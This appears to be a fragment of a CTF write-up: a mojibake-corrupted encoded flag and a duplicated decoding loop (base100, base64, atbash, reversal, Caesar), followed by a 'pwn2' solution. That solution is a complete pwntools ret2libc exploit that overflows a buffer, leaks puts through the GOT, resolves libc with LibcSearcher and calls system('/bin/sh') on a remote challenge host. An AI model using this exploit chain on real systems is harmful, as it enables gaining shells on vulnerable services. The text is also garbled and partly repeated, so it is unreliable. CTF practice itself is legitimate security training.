ðœððððœðð¢ðð»ðððð¢ððŠðððð¬ ðð£ð§ððð£ðð¿ðð»ðœðððšðð¬ðð€ð«ðððœððððœððððð
ðŸðð£ððððªðððð€ð¯ððð£ðððð¥ððððð§ð°"
flag = flag.replace(" ", "")
decoded_flag = base100_decode(flag)
for _ in range(20):
decoded_flag = base64_decode(decoded_flag)
decoded_flag = atbash_cipher(decoded_flag)
for _ in range(21):
decoded_flag = string_reverse(decoded_flag)
print(decoded_flag)
decoded_flag = caesar_decrypt(decoded_flag, 8)
print(decoded_flag)
flag = flag.replace(" ", "")
decoded_flag = base100_decode(flag)
for _ in range(20):
decoded_flag = base64_decode(decoded_flag)
decoded_flag = atbash_cipher(decoded_flag)
for _ in range(21):
decoded_flag = string_reverse(decoded_flag)
print(decoded_flag)
decoded_flag = caesar_decrypt(decoded_flag, 8)
print(decoded_flag)
|
Pwn
pwn2
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
| from pwn import *
from ctypes import *
from LibcSearcher import *
context(os='linux', arch='amd64', log_level='debug')
def s(a) : io.send(a)
def inter() : io.interactive()
def debug():
gdb.attach(io)
pause()
def get_addr() : return u64(io.recvuntil(b'\x7f')[-6:].ljust(8, b'\x00'))
def inter() : io.interactive()
io = remote('vt.jnxl2023.sierting.com',31613)
elf = ELF('./pwn')
move=0x10
def get_addr():
return u64(io.recvuntil(b'\x7f')[-6:].ljust(8, b'\x00'))
pop_rdi=0x4011e3
ret=0x40101a
function_got=elf.got['puts']
function_plt=elf.plt['puts']
main=elf.sym['main']
payload1=b'a'*(move+8)+p64(pop_rdi)+p64(function_got)+p64(function_plt)+p64(main)
io.recvuntil(b'gift:\n')
io.sendline(payload1)
tgtaddr=get_addr()
libc=LibcSearcher('puts',tgtaddr)
addr=tgtaddr-libc.dump('puts')
binsh=addr+libc.dump('str_bin_sh')
sys=addr+libc.dump('system')
payload2=b'a'*(move+8)+p64(ret)+p64(pop_rdi)+p64(binsh)+p64(sys)
io.sendline(payload2)
io.interactive()
|
